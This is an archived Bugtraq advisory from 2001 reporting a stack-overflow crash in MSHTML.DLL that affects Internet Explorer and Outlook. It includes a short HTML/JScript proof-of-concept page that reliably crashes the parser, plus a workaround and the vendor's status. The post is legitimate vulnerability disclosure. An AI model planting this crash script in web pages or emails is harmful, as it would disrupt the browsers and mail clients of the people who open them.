[18625] in bugtraq
Stack Overflow in MSHTML.DLL
daemon@ATHENA.MIT.EDU (Thor Larholm)
Mon Jan 15 15:10:44 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <049601c07ec9$d5e38d40$e18270d4@wks.jubii.dk>
Date: Mon, 15 Jan 2001 09:04:50 +0100
Reply-To: Thor Larholm <thor@JUBII.DK>
From: Thor Larholm <thor@JUBII.DK>
To: BUGTRAQ@SECURITYFOCUS.COM
Stack Overflow in MSHTML.DLL
Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled emailreaders).
Reliably tested on IE4.0 and higher on any Windows system, with any servicepacks
and patches.
Older versions of MSHTML.DLL may be affected too, but remains untested.
Risk: Low/Medium
Description:
MSHTML.DLL crashes with a Stack Overflow from simple scripting.
Details:
The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.
Code:
------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------
Workaround:
Disable Active Scripting.
Vendor status:
Microsoft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be adressed in a future SP
for IE.
--
Thor Larholm
